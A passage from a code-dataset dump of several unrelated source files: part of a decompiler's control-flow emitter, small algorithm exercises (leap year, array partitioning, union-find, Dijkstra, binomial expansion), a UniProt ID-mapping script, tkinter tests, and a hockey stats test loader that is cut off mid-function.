context.fmt)\n body.add_statement(SimpleStatement(f\"return {ret_str};\", is_jump=True))\n context.is_void = False\n else:\n body.add_statement(SimpleStatement(\"return;\", is_jump=True))\n\n\ndef build_switch_statement(\n context: Context,\n jump: SwitchControl,\n case_nodes: List[Node],\n switch_index: int,\n end: Node,\n) -> SwitchStatement:\n \"\"\"\n This is a helper function for building both regular & irregular switch bodies.\n It returns a SwitchStatement with the body populated with the given set of nodes.\n The nodes must already be labeled with `add_labels_for_switch` before calling this.\n \"\"\"\n switch_body = Body(print_node_comment=context.options.debug)\n\n # If there are any case labels to jump to the `end` node immediately after the\n # switch block, emit them as `case ...: break;` at the start of the switch block\n # instead. This avoids having \"dangling\" `case ...:` labels outside of the block.\n remaining_labels = []\n for index, case_label in context.case_nodes[end]:\n if index == switch_index:\n comments = comments_for_switch(switch_index)\n switch_body.add_statement(\n SimpleStatement(f\"{case_label}:\", comments=comments, indent=-1)\n )\n else:\n remaining_labels.append((index, case_label))\n if len(remaining_labels) != len(context.case_nodes[end]):\n switch_body.add_statement(SimpleStatement(\"break;\", is_jump=True))\n context.case_nodes[end] = remaining_labels\n\n # Order case blocks by their position in the asm, not by their order in the jump table\n # (but use the order in the jump table to break ties)\n sorted_cases = sorted(\n set(case_nodes), key=lambda node: (node.block.index, case_nodes.index(node))\n )\n next_sorted_cases: List[Optional[Node]] = []\n next_sorted_cases.extend(sorted_cases[1:])\n next_sorted_cases.append(None)\n for case, next_case in zip(sorted_cases, next_sorted_cases):\n if case in context.emitted_nodes or case is end:\n pass\n elif (\n next_case is not None\n and next_case not in context.emitted_nodes\n and next_case is not end\n and next_case in case.postdominators\n ):\n switch_body.extend(build_flowgraph_between(context, case, next_case))\n if not switch_body.ends_in_jump():\n switch_body.add_comment(\"fallthrough\")\n else:\n switch_body.extend(build_flowgraph_between(context, case, end))\n if not switch_body.ends_in_jump():\n switch_body.add_statement(SimpleStatement(\"break;\", is_jump=True))\n return SwitchStatement(jump, switch_body, switch_index)\n\n\ndef build_switch_between(\n context: Context,\n switch: SwitchNode,\n default: Optional[Node],\n end: Node,\n) -> SwitchStatement:\n \"\"\"\n Output the subgraph between `switch` and `end`, but not including `end`.\n The returned SwitchStatement starts with the jump to the switch's value.\n This is only used for single jump table switches; not irregular switches.\n \"\"\"\n switch_cases = switch.cases[:]\n if default is end:\n default = None\n elif default is not None:\n switch_cases.append(default)\n\n jump = get_block_info(switch).switch_control\n assert jump is not None\n\n switch_index = add_labels_for_switch(\n context,\n switch,\n jump.control_expr.type,\n cases=list(enumerate(switch.cases, start=jump.offset)),\n default_node=default,\n )\n\n return build_switch_statement(context, jump, switch_cases, switch_index, end)\n\n\ndef detect_loop(context: Context, start: Node, end: Node) -> Optional[DoWhileLoop]:\n assert start.loop\n\n # Find the the condition for the do-while, if it exists\n condition: Optional[Condition] = None\n for node in start.loop.backedges:\n if (\n node in start.postdominators\n and isinstance(node, ConditionalNode)\n and node.fallthrough_edge == end\n ):\n block_info = get_block_info(node)\n assert block_info.branch_condition is not None\n condition = block_info.branch_condition\n new_end = node\n break\n if not condition:\n return None\n\n loop_body = build_flowgraph_between(\n context,\n start,\n new_end,\n skip_loop_detection=True,\n )\n emit_node(context, new_end, loop_body)\n\n return DoWhileLoop(loop_body, condition)\n\n\ndef build_flowgraph_between(\n context: Context, start: Node, end: Node, skip_loop_detection: bool = False\n) -> Body:\n \"\"\"\n Output a section of a flow graph that has already been translated to our\n symbolic AST. All nodes between start and end, including start but NOT end,\n will be printed out using if-else statements and block info.\n\n `skip_loop_detection` is used to prevent infinite recursion, since (in the\n case of loops) this function can be recursively called by itself (via\n `detect_loop`) with the same `start` argument.\n \"\"\"\n curr_start: Node = start\n body = Body(print_node_comment=context.options.debug)\n\n # We will split this graph into subgraphs, where the entrance and exit nodes\n # of that subgraph are at the same indentation level. \"curr_start\" will\n # iterate through these nodes by taking the immediate postdominators,\n # which are commonly referred to as articulation nodes.\n while curr_start != end:\n assert not isinstance(curr_start, TerminalNode)\n\n if (\n not skip_loop_detection\n and curr_start.loop\n and curr_start not in context.emitted_nodes\n ):\n # Find the immediate postdominator to the whole loop,\n # i.e. the first node outside the loop body\n imm_pdom: Node = curr_start\n while imm_pdom in curr_start.loop.nodes:\n assert imm_pdom.immediate_postdominator is not None\n imm_pdom = imm_pdom.immediate_postdominator\n\n # Construct the do-while loop\n do_while_loop = detect_loop(context, curr_start, imm_pdom)\n if do_while_loop:\n body.add_do_while_loop(do_while_loop)\n\n # Move on.\n curr_start = imm_pdom\n continue\n\n # If the current node has already been emitted and is equivalent to\n # goto'ing the end node, we don't need to emit anything else. This\n # avoids jumping to an empty node (or another jump) at the end of a\n # block, like `{ block_N: break; ... goto block_N; }`\n if curr_start in context.emitted_nodes and is_empty_goto(curr_start, end):\n break\n\n # Write the current node, or a goto, to the body\n if not emit_node(context, curr_start, body):\n # If the node was already witten, emit_node will use a goto\n # and return False. After the jump, there control flow will\n # continue from there (hopefully hitting `end`!)\n break\n\n if curr_start.emit_goto:\n # If we have decided to emit a goto here, then we should just fall\n # through to the next node by index, after writing a goto.\n emit_goto(context, curr_start, body)\n\n # Advance to the next node in block order. This may skip over\n # unreachable blocks -- hopefully none too important.\n index = context.flow_graph.nodes.index(curr_start)\n fallthrough = context.flow_graph.nodes[index + 1]\n if isinstance(curr_start, ConditionalNode):\n assert fallthrough == curr_start.fallthrough_edge\n curr_start = fallthrough\n continue\n\n # The interval to process is [curr_start, curr_start.immediate_postdominator)\n curr_end = curr_start.immediate_postdominator\n assert curr_end is not None\n\n # For nodes with branches, curr_end is not a direct successor of curr_start\n\n irregular_switch: Optional[SwitchStatement] = None\n if context.options.switch_detection:\n irregular_switch = try_build_irregular_switch(context, curr_start, curr_end)\n\n if irregular_switch is not None:\n body.add_switch(irregular_switch)\n elif switch_guard_expr(curr_start) is not None:\n # curr_start is a ConditionalNode that falls through to a SwitchNode,\n # where the condition checks that the switch's control expression is\n # within the jump table bounds.\n # We can combine the if+switch into just a single switch block.\n assert isinstance(\n curr_start, ConditionalNode\n ), \"checked by switch_guard_expr\"\n switch_node = curr_start.fallthrough_edge\n assert isinstance(switch_node, SwitchNode), \"checked by switch_guard_expr\"\n default_node = curr_start.conditional_edge\n # switch_guard_expr checked that switch_node has no statements to write,\n # so it is OK to mark it as emitted\n context.emitted_nodes.add(switch_node)\n if curr_end is switch_node:\n curr_end = switch_node.immediate_postdominator\n assert curr_end in curr_start.postdominators\n body.add_switch(\n build_switch_between(context, switch_node, default_node, curr_end)\n )\n elif isinstance(curr_start, SwitchNode):\n body.add_switch(build_switch_between(context, curr_start, None, curr_end))\n elif isinstance(curr_start, ConditionalNode):\n body.add_if_else(build_conditional_subgraph(context, curr_start, curr_end))\n elif (\n isinstance(curr_start, BasicNode) and curr_start.fake_successor == curr_end\n ):\n curr_end = curr_start.successor\n else:\n # No branch, but double check that we didn't skip any nodes.\n # If the check fails, then the immediate_postdominator computation was wrong\n assert curr_start.children() == [curr_end], (\n f\"While emitting flowgraph between {start.name()}:{end.name()}, \"\n f\"skipped nodes while stepping from {curr_start.name()} to {curr_end.name()}.\"\n )\n\n # Move on.\n curr_start = curr_end\n return body\n\n\ndef build_naive(context: Context, nodes: List[Node]) -> Body:\n \"\"\"Naive procedure for generating output with only gotos for control flow.\n\n Used for --gotos-only, when the regular if_statements code fails.\"\"\"\n\n body = Body(print_node_comment=context.options.debug)\n\n def emit_goto_or_early_return(node: Node, body: Body) -> None:\n if isinstance(node, ReturnNode) and not node.is_real():\n emit_node(context, node, body)\n else:\n emit_goto(context, node, body)\n\n def emit_successor(node: Node, cur_index: int) -> None:\n if (\n cur_index + 1 < len(nodes)\n and nodes[cur_index + 1] == node\n and not (isinstance(node, ReturnNode) and not node.is_real())\n ):\n # Fallthrough is fine\n return\n emit_goto_or_early_return(node, body)\n\n for i, node in enumerate(nodes):\n if isinstance(node, ReturnNode):\n # Do not emit duplicated (non-real) return nodes; they don't have\n # a well-defined position, so we emit them next to where they are\n # jumped to instead.\n if node.is_real():\n emit_node(context, node, body)\n elif isinstance(node, BasicNode):\n emit_node(context, node, body)\n emit_successor(node.successor, i)\n elif isinstance(node, SwitchNode):\n jump = get_block_info(node).switch_control\n assert jump is not None\n index = add_labels_for_switch(\n context,\n node,\n jump.control_expr.type,\n cases=list(enumerate(node.cases, start=jump.offset)),\n default_node=None,\n )\n emit_node(context, node, body)\n body.add_switch(\n SwitchStatement(\n jump=jump,\n body=Body(print_node_comment=False),\n index=index,\n )\n )\n elif isinstance(node, ConditionalNode):\n emit_node(context, node, body)\n if_body = Body(print_node_comment=True)\n emit_goto_or_early_return(node.conditional_edge, if_body)\n block_info = get_block_info(node)\n assert block_info.branch_condition is not None\n body.add_if_else(\n IfElseStatement(\n block_info.branch_condition,\n if_body=if_body,\n else_body=None,\n )\n )\n emit_successor(node.fallthrough_edge, i)\n else:\n assert isinstance(node, TerminalNode)\n\n return body\n\n\ndef build_body(context: Context, options: Options) -> Body:\n start_node: Node = context.flow_graph.entry_node()\n terminal_node: Node = context.flow_graph.terminal_node()\n is_reducible = context.flow_graph.is_reducible()\n\n if options.debug:\n print(\"Here's the whole function!\\n\")\n\n # Label switch nodes\n switch_nodes = [n for n in context.flow_graph.nodes if isinstance(n, SwitchNode)]\n if len(switch_nodes) == 1:\n # There is only one switch in this function (no need to label)\n context.switch_nodes[switch_nodes[0]] = 0\n else:\n for i, switch_node in enumerate(switch_nodes):\n context.switch_nodes[switch_node] = i + 1\n\n body: Body\n if options.ifs and is_reducible:\n body = build_flowgraph_between(context, start_node, terminal_node)\n body.elide_empty_returns()\n else:\n body = Body(print_node_comment=context.options.debug)\n if options.ifs and not is_reducible:\n body.add_comment(\n \"Flowgraph is not reducible, falling back to gotos-only mode.\"\n )\n body.extend(build_naive(context, context.flow_graph.nodes))\n\n # Check no nodes were skipped: build_flowgraph_between should hit every node in\n # well-formed (reducible) graphs; and build_naive explicitly emits every node\n for node in context.flow_graph.nodes:\n if node in context.emitted_nodes or isinstance(node, TerminalNode):\n continue\n if isinstance(node, ReturnNode) and not node.is_real():\n continue\n body.add_comment(\n f\"bug: did not emit code for node #{node.name()}; contents below:\"\n )\n emit_node(context, node, body)\n\n return body\n\n\ndef get_function_text(function_info: FunctionInfo, options: Options) -> str:\n fmt = options.formatter()\n context = Context(flow_graph=function_info.flow_graph, options=options, fmt=fmt)\n body: Body = build_body(context, options)\n\n function_lines: List[str] = []\n\n if function_info.symbol.demangled_str is not None:\n function_lines.append(\n fmt.with_comments(\"\", [function_info.symbol.demangled_str])\n )\n\n fn_name = function_info.stack_info.function.name\n arg_strs = []\n for i, arg in enumerate(function_info.stack_info.arguments):\n if i == 0 and function_info.stack_info.replace_first_arg is not None:\n original_name, original_type = function_info.stack_info.replace_first_arg\n arg_strs.append(original_type.to_decl(original_name, fmt))\n else:\n arg_strs.append(arg.type.to_decl(arg.format(fmt), fmt))\n if function_info.stack_info.is_variadic:\n arg_strs.append(\"...\")\n arg_str = \", \".join(arg_strs) or \"void\"\n\n fn_header = f\"{fn_name}({arg_str})\"\n\n if context.is_void:\n fn_header = f\"void {fn_header}\"\n else:\n fn_header = function_info.return_type.to_decl(fn_header, fmt)\n whitespace = \"\\n\" if fmt.coding_style.newline_after_function else \" \"\n function_lines.append(f\"{fn_header}{whitespace}{{\")\n\n any_decl = False\n\n with fmt.indented():\n # Format the body first, because this can result in additional type inferencce\n formatted_body = body.format(fmt)\n\n local_vars = function_info.stack_info.local_vars\n # GCC's stack is ordered low-to-high (e.g. `int sp10; int sp14;`)\n # IDO's and MWCC's stack is ordered high-to-low (e.g. `int sp14; int sp10;`)\n if options.target.compiler != Target.CompilerEnum.GCC:\n local_vars = local_vars[::-1]\n for local_var in local_vars:\n type_decl = local_var.toplevel_decl(fmt)\n if type_decl is not None:\n comments = []\n if local_var.value in function_info.stack_info.weak_stack_var_locations:\n comments = [\"compiler-managed\"]\n function_lines.append(\n SimpleStatement(f\"{type_decl};\", comments=comments).format(fmt)\n )\n any_decl = True\n\n temp_decls = []\n for var in function_info.stack_info.temp_vars:\n if var.is_emitted:\n type_decl = var.type.to_decl(var.format(fmt), fmt)\n temp_decls.append(f\"{type_decl};\")\n any_decl = True\n for decl in sorted(temp_decls):\n function_lines.append(SimpleStatement(decl).format(fmt))\n\n for phi_var in function_info.stack_info.naive_phi_vars:\n type_decl = phi_var.type.to_decl(phi_var.get_var_name(), fmt)\n function_lines.append(SimpleStatement(f\"{type_decl};\").format(fmt))\n any_decl = True\n\n # Create a variable to cast the original first argument to the assumed type\n if function_info.stack_info.replace_first_arg is not None:\n assert len(function_info.stack_info.arguments) >= 1\n replaced_arg = function_info.stack_info.arguments[0]\n original_name, original_type = function_info.stack_info.replace_first_arg\n\n lhs = replaced_arg.type.to_decl(replaced_arg.format(fmt), fmt)\n rhs = f\"({replaced_arg.type.format(fmt)}) {original_name}\"\n function_lines.append(SimpleStatement(f\"{lhs} = {rhs};\").format(fmt))\n\n if any_decl:\n function_lines.append(\"\")\n\n function_lines.append(formatted_body)\n function_lines.append(\"}\")\n full_function_text: str = \"\\n\".join(function_lines)\n return full_function_text\n","repo_name":"doldecomp/melee","sub_path":"tools/m2c/m2c/if_statements.py","file_name":"if_statements.py","file_ext":"py","file_size_in_byte":60062,"program_lang":"python","lang":"en","doc_type":"code","stars":553,"dataset":"github-code","pt":"78"} +{"seq_id":"34406003132","text":"#Lab_Excersie_2\n#Q.3 Check whether the given year is leap year or not. If year is leap print ‘LEAP YEAR’ else print ‘COMMON YEAR’.\n#Hint: • a year is a leap year if its number is exactly divisible by 4 and is not exactly divisible by 100\n#• a year is always a leap year if its number is exactly divisible by 400\n\ncurrentYear = int(input('Enter the year to find whether the year is leap year or not.'))\n\n\nif currentYear % 4 == 0:\n if currentYear % 100 ==0:\n if currentYear % 400 == 0:\n result = \"LEAP YEAR\"\n else:\n result = \"COMMON YEAR\"\n else:\n result = \"LEAP YEAR\"\nelse:\n result = \"COMMON YEAR\"\n \nprint(\"The year \",currentYear,\"is a\",result)","repo_name":"bishnusilwal/python-files","sub_path":"9.leap_year_or_not.py","file_name":"9.leap_year_or_not.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5160107932","text":"\"\"\"\n@author: zwf\n@contact: zhengwenfeng37@gmail.com\n@time: 2023/6/23 15:08\n@desc:\n https://leetcode.cn/problems/diao-zheng-shu-zu-shun-xu-shi-qi-shu-wei-yu-ou-shu-qian-mian-lcof/?envType=study-plan-v2&envId=coding-interviews\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def exchange3(self, nums: List[int]) -> List[int]:\n \"\"\"\n 创建新的数组,遍历nums,将奇数从左插入,偶数从右插入。\n\n 这里用到了python list特性,可以从左右插入,并且会动态扩容。\n\n 时间复杂度:O(n)\n 控件复杂度:O(n)\n\n \"\"\"\n\n ret = []\n\n for num in nums:\n if num % 2 == 0:\n ret.append(num)\n else:\n ret.insert(0, num)\n\n return ret\n\n def exchange2(self, nums: List[int]) -> List[int]:\n \"\"\"\n 纯数组特性,而不是用python list特性\n\n 创建新的数组,使用left和right记录数组两端索引,然后遍历,将奇数从左填入,left+1,将偶数从右插入,right-1\n\n\n 时间复杂度:O(n)\n 控件复杂度:O(n)\n \"\"\"\n\n n = len(nums)\n left, right = 0, n - 1\n ret_nums = [0] * n\n for num in nums:\n if num % 2 == 0:\n ret_nums[right] = num\n right -= 1\n else:\n ret_nums[left] = num\n left += 1\n\n return ret_nums\n\n def exchange(self, nums: List[int]) -> List[int]:\n \"\"\"\n 原地交换,而不是用新的数组.\n\n 时间复杂度:O(n)\n 控件福再度: O(1)\n\n 双指针,分别指向左右两端。\n 左端开始遍历\n 如果左端是奇数,则代表顺序对的,则继续遍历。\n 如果左端是偶数,则从右端开始遍历,右端遍历如果是偶数则继续遍历,如果是奇数,则与前端的数进行交换。\n \"\"\"\n n = len(nums)\n left, right = 0, n-1\n\n while left < right:\n while right > left and nums[left] % 2 == 1:\n left += 1\n\n while right > left and nums[right] % 2 == 0:\n right -= 1\n\n if right > left:\n nums[left], nums[right] = nums[right], nums[left]\n left += 1\n right -= 1\n\n return nums\n\n\n\n\n\n\nif __name__ == '__main__':\n s = Solution()\n ret = s.exchange([1, 2, 3, 4])\n print(ret)\n","repo_name":"tenqaz/crazy_arithmetic","sub_path":"leetcode/剑指offer/剑指 Offer 21. 调整数组顺序使奇数位于偶数前面.py","file_name":"剑指 Offer 21. 调整数组顺序使奇数位于偶数前面.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4100062390","text":"#!/usr/bin/python -t\n\n# union find\n\nclass ConnectingGraph2:\n \"\"\"\n @param: n: An integer\n \"\"\"\n def __init__(self, n):\n # do intialization if necessary\n self.father = [0] * (1+n)\n for i in range(1, n+1):\n self.father[i] = i\n \n self.size = [1] * (1+n)\n\n def find(self, a):\n #print self.father, a\n if self.father[a] == a:\n return a\n \n return self.find(self.father[a])\n \n \"\"\"\n @param: a: An integer\n @param: b: An integer\n @return: nothing\n \"\"\"\n def connect(self, a, b):\n # write your code here\n #print a, b\n roota = self.find(a)\n #print roota\n rootb = self.find(b)\n #print roota, rootb\n if roota == rootb:\n return\n \n self.father[roota] = rootb\n self.size[rootb] = self.size[roota]+self.size[rootb]\n #print self.father\n #print self.size\n return\n \n\n \"\"\"\n @param: a: An integer\n @return: An integer\n \"\"\"\n def query(self, a):\n # write your code here\n return self.size[self.find(a)]\n","repo_name":"boknowswiki/mytraning","sub_path":"lintcode/python/0590_connecting_graph_II.py","file_name":"0590_connecting_graph_II.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"33395822050","text":"#Module for retrieving a list of Uniprot IDsassociated with a gene name, this functionalty enables the retrieval \\\n#of EggNOG IDs for showing an EggNOG phylogenetic tree in the webapp\nimport requests\nfrom time import sleep\nimport simplejson as json\n\n#logfile to track any connection errors that may occur during runtime while connecting to Uniprot\nlogfile = open('idmapper_logfile.txt', 'a')\n#list containing all the plant species present in the Uniprot database\nfile = open('speclist.txt', 'r')\nspec_file = file.read().splitlines()\n# Loading the all plants file which contains all (by uniprot) known abbrevations for plants.\nspecies_file = open(\"all_plants.txt\")\nspecies_lines = species_file.read().splitlines()\n\n\n#Function for translating gene names to Uniprot ID's\ndef species_identifier(articles_doc):\n #Defining the api URL\n uni_url = 'http://www.uniprot.org/uploadlists/'\n #Loading the gene file, should be replaced by JSON logic\n articles_doc = json.loads(articles_doc)\n\n #Loops over the list of genes and requests uniprot to translate the genename to uniprot IDs\n for a, article in enumerate(articles_doc):\n print(a)\n genes = [x['name'] for x in article['genes']]\n for n, gene in enumerate(genes):\n attempt = 0\n go = True\n while go:\n try:\n counter = n\n #Defining parameters for the uniprot api\n payload = {\n 'from': 'GENENAME',\n 'to': 'ID',\n 'format': 'list',\n 'query': gene\n }\n uniprot_id_request = requests.get(uni_url, params= payload)\n text1 = uniprot_id_request.text\n textsplit = text1.split()\n #check is used to check if a result needs to be saved or not.\n\n #Loops over the list of uniprot IDsand checks if it is in the list of plants\n #if it is in the list of plants it wil request uniprot to translate the uniprot id to an EggNOG id and save this result.\n #It will only save the first result which is a plant and has a EggNOG id.\n\n if textsplit is not None or len(textsplit) != 0:\n uniprot_ids = []\n for x in textsplit:\n #second part of the Uniprot ID contains a species mnemonic (often a abbreviation)\n species = x.split(\"_\")[1]\n #Checks if it is a plant by comparing with the speclist.txt file\n if species in species_lines:\n uniprot_ids.append(x)\n update_json_record(uniprot_ids, gene, species, article)\n\n go = False\n except requests.ConnectionError:\n go = True\n attempt += 1\n except requests.ConnectTimeout:\n go = True\n attempt += 1\n except requests.HTTPError:\n go = True\n attempt += 1\n finally:\n if attempt > 2:\n sleep(3)\n if attempt > 3:\n logfile.write('ERROR for ' + gene + \" in: \" + article['pmid'] + '\\n')\n go = False\n logfile.close()\n return articles_doc\n\n#Function for updating the json record with the full information from the articles\ndef update_json_record(uniprot_ids, gene, species, article):\n\n #Fetch bionominal name for mnemonic\n binominal = fetch_full_species(species)\n\n #gene document compatible with json format with substructures for orthologs and Uniprot IDs\n gene_doc = {'name': gene, 'orthologs':{}, 'uniprot_ids': uniprot_ids}\n species = article['species']\n all_species = [x['name'] for x in species]\n # Checks if the species name is already present in the json record for a certain article\n if binominal in all_species:\n for n, spec in enumerate(species):\n if species[n]['name'] == binominal:\n species_doc = species[n]\n #Else: create a new record for the species name with a substructure for genes\n else:\n species_doc = {'name': binominal, 'genes': []}\n species.append(species_doc)\n genes = species_doc['genes']\n all_genes = [x['name'] for x in genes]\n #If the gene is not already present in the articles_doc json for this particular species, append to the doc\n if gene not in all_genes:\n genes.append(gene_doc)\n\n\n#Function for retrieving the full (binominal) name for a Uniprot mnemonic by scanning speclist.txt\ndef fetch_full_species(species):\n\n #binominal name is in the same line as mnemonic\n for line in spec_file:\n if species and \"N=\" in line:\n binominal = line.split(\"N=\")[1].strip()\n #if the full species name is not present in the file, return the name as the mnemonic\n else:\n binominal = species\n\n return binominal\n","repo_name":"heleensev/TextGraver","sub_path":"Textminer/textgraver/id_mapper.py","file_name":"id_mapper.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42122241361","text":"import string\nimport math\n\ndef str_to_numb(str):\n if not str:\n return 1\n is_negative = False\n if '-' in str:\n is_negative = True\n str = str.strip('-')\n if not str:\n return -1\n return int(str) * (-1) if is_negative else int(str)\n\ndef expand(expr):\n paranthesis, power = expr.split('^')\n n = int(power)\n if n == 0:\n return \"1\"\n equation = paranthesis.strip('(').strip(')')\n if n == 1:\n return equation\n for indx, char in enumerate(equation):\n if char in string.ascii_lowercase:\n equation = equation.split(char)\n equation.append(char)\n break\n\n a = str_to_numb(equation[0])\n b = str_to_numb(equation[1])\n return_eq = []\n for k in reversed(range(n + 1)):\n fact = math.factorial(n) / (math.factorial(k) * math.factorial(n - k))\n variable = (equation[2] if k > 0 else '') + ('^' + str(k) if k > 1 else '')\n adj = int(fact * a**k * b**(n-k))\n str_adj = ''\n if adj != 1:\n str_adj = str(adj) if adj != -1 else str(adj).strip('1')\n elif k == 0:\n str_adj = str(adj)\n\n return_eq.append(str_adj + variable)\n return '+'.join(return_eq).replace(\"+-\", \"-\")\n","repo_name":"RevinderDev/code-wars","sub_path":"python/3kyu/binomial_expansion.py","file_name":"binomial_expansion.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42568259437","text":"__title__ = \"pesp\"\n__version__ = \"0.1.7\"\n__license__ = \"MIT\"\n__description__ = \"Python encapsulating security payload server.\"\n__keywords__ = \"ike esp ip tcp udp\"\n__author__ = \"Qian Wenjie\"\n__email__ = \"qianwenjie@gmail.com\"\n__url__ = \"https://github.com/qwj/python-esp\"\n\n__all__ = ['__title__', '__version__', '__description__', '__url__']\n","repo_name":"leonliu315/python-esp","sub_path":"pesp/__doc__.py","file_name":"__doc__.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"45533459884","text":"import unittest\nimport unittest\nfrom collections import defaultdict\n\nimport tkinter as tk\nfrom src.manager_commands import Setting\nfrom tkinter.ttk import Notebook, Frame, Button\n\n\nclass MyTestCase(unittest.TestCase):\n\n def test_modify_project_config(self):\n Setting('template').execute()\n\n def test_paned_window(self):\n pw = tk.PanedWindow(orient='vertical', showhandle=True, sashrelief='sunken')\n pw.pack(fill='both', expand=1)\n\n top = tk.Label(pw, text='top label', bg='red')\n bottom = tk.Label(pw, text='bottom label', bg='green')\n\n pw.add(top)\n pw.add(bottom)\n\n pw.mainloop()\n\n def test_notebook(self):\n nb = Notebook(padding=10)\n\n frm1 = Frame(nb)\n frm2 = Frame(nb)\n\n btn1 = Button(frm1, text='btn1')\n btn2 = Button(frm2, text='btn2')\n btn1.pack()\n btn2.pack()\n\n nb.add(frm1, text='frm1')\n nb.add(frm2, text='frm2')\n nb.pack(fill='both', expand=1)\n nb.mainloop()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"ArchShun/AutoCadHelper","sub_path":"test/test_manager_commands.py","file_name":"test_manager_commands.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21083724464","text":"import sys\nimport heapq\n\nfastin = sys.stdin.readline\nINF = sys.maxsize\n\nv, e = map(int, fastin().split())\nk = int(fastin())\n\nw = [INF] * (v+1)\nheap = []\ngraph = [[] for _ in range(v+1)]\n\n\ndef dij(start):\n w[start] = 0\n heapq.heappush(heap, (0, start))\n \n while heap:\n weight, now = heapq.heappop(heap)\n if w[now] < weight: continue\n \n for wei, next in graph[now]:\n next_wei = wei + weight\n if next_wei < w[next]:\n w[next] = next_wei\n \n heapq.heappush(heap, (next_wei, next))\n \n \nfor _ in range(e):\n U, V, W = map(int, fastin().split())\n graph[U].append((W, V))\n \ndij(k)\nfor i in range(1, v+1):\n print(\"INF\" if w[i] == INF else w[i])","repo_name":"SquirtlesAlgorithmStudy/squirtlesAlgorithmStudy-S345","sub_path":"민정/20220511/boj1753.py","file_name":"boj1753.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"11171991685","text":"from datetime import datetime\nfrom collections import namedtuple\nfrom random import randrange\n\nfrom data_models.penalty import Penalty\nfrom data_models.goal import Goal\nfrom data_models.game import Game\nfrom data_models.team import Team\nfrom data_models.skater_stat import SkaterStat\nfrom data_models.goalie_stat import GoalieStat\nfrom data_loaders.test_player_loader import TEAMS, create_player\n\n\nGameData = namedtuple('GameData', 'id, home, away')\nGAMES = [\n GameData(id=21, home=TEAMS[0], away=TEAMS[1]),\n GameData(id=22, home=TEAMS[2], away=TEAMS[3]),\n GameData(id=23, home=TEAMS[4], away=TEAMS[7]),\n GameData(id=24, home=TEAMS[4], away=TEAMS[5]),\n GameData(id=25, home=TEAMS[6], away=TEAMS[7]),\n GameData(id=26, home=TEAMS[8], away=TEAMS[0])\n]\n\n\ndef _get_skater_stat(game, player):\n st = SkaterStat()\n st.game = game\n st.date = game.date\n st.team = player.current_team\n st.player = player\n st.assists = randrange(0, 3)\n st.goals = randrange(0, 3)\n st.shots = randrange(0, 8)\n st.hits = randrange(0, 5)\n st.pp_goals = randrange(0, 2)\n st.pp_assists = randrange(0, 2)\n st.penalty_minutes = randrange(0, 4)\n st.face_off_wins = randrange(0, 4)\n st.face_off_taken = st.face_off_wins + randrange(2, 6)\n st.takeaways = randrange(0, 3)\n st.giveaways = randrange(0, 3)\n st.sh_goals = randrange(0, 2)\n st.sh_assists = randrange(0, 2)\n st.blocked = randrange(0, 5)\n st.plus_minus = randrange(-3, 4)\n st.even_toi = randrange(0, 600)\n st.pp_toi = randrange(0, 120)\n st.sh_toi = randrange(0, 120)\n st.toi = st.even_toi + st.pp_toi + st.sh_toi\n return st\n\n\ndef _get_goalie_stat(game, player):\n st = GoalieStat()\n st.game = game\n st.date = game.date\n st.team = player.current_team\n st.player = player\n st.toi = 3600\n st.assists = 0\n st.goals = 0\n st.penalty_minutes = randrange(0, 3)\n st.pp_saves = randrange(0, 30)\n st.sh_saves = randrange(0, 5)\n st.even_saves = randrange(0, 5)\n st.saves = st.even_saves + st.pp_saves + st.sh_saves\n st.sh_shots_against = st.sh_saves + randrange(0, 2)\n st.even_shots_against = st.even_saves + randrange(0, 3)\n st.pp_shots_against = st.pp_saves + randrange(0, 2)\n st.shots = st.even_shots_against + st.sh_shots_against + st.pp_shots_against\n st.decision = 'winner' if randrange(0, 2) == 1 else 'loser'\n return st\n\n\ndef _create_game_stat(link):\n date = datetime(2016, 4, 30).date()\n home = Team()\n home.id = GAMES[link].home.id\n away = Team()\n away.id = GAMES[link].away.id\n\n game = Game()\n game.id = GAMES[link].id\n game.date = date\n game.home = Game.TeamStat()\n game.home.team = home\n game.home.goals_period1 = randrange(0, 3)\n game.home.goals_period2 = randrange(0, 3)\n game.home.goals_period3 = randrange(0, 3)\n game.home.goals = game.home.goals_period1 + game.home.goals_period2 + game.home.goals_period3\n game.home.shots = randrange(10, 40)\n game.home.pp_goals = randrange(0, 2)\n game.home.pp_opportunities = game.home.pp_goals + randrange(0, 3)\n game.home.face_off_wins = randrange(10, 30)\n game.home.blocked = randrange(5, 15)\n game.home.hits = randrange(5, 15)\n game.home.penalty_minutes = randrange(0, 20)\n game.away = Game.TeamStat()\n game.away.team = away\n game.away.goals_period1 = randrange(0, 3)\n game.away.goals_period2 = randrange(0, 3)\n game.away.goals_period3 = randrange(0, 3)\n game.away.goals = game.away.goals_period1 + game.away.goals_period2 + game.away.goals_period3\n game.away.shots = randrange(10, 40)\n game.away.pp_goals = randrange(0, 2)\n game.away.pp_opportunities = game.away.pp_goals + randrange(0, 3)\n game.away.face_off_wins = randrange(10, 30)\n game.away.blocked = randrange(5, 15)\n game.away.hits = randrange(5, 15)\n game.away.penalty_minutes = randrange(0, 20)\n game.is_regular = True\n game.win_type = 'regular'\n if game.home.goals == game.away.goals:\n game.home.goals += 1\n game.home.goals_period3 += 1\n game.face_off_taken = game.home.face_off_wins + game.away.face_off_wins\n return game\n\n\ndef get_games_list(start, end):\n return list(range(0, 6))\n\n\ndef get_game_info(link):\n goals = []\n penalties = []\n 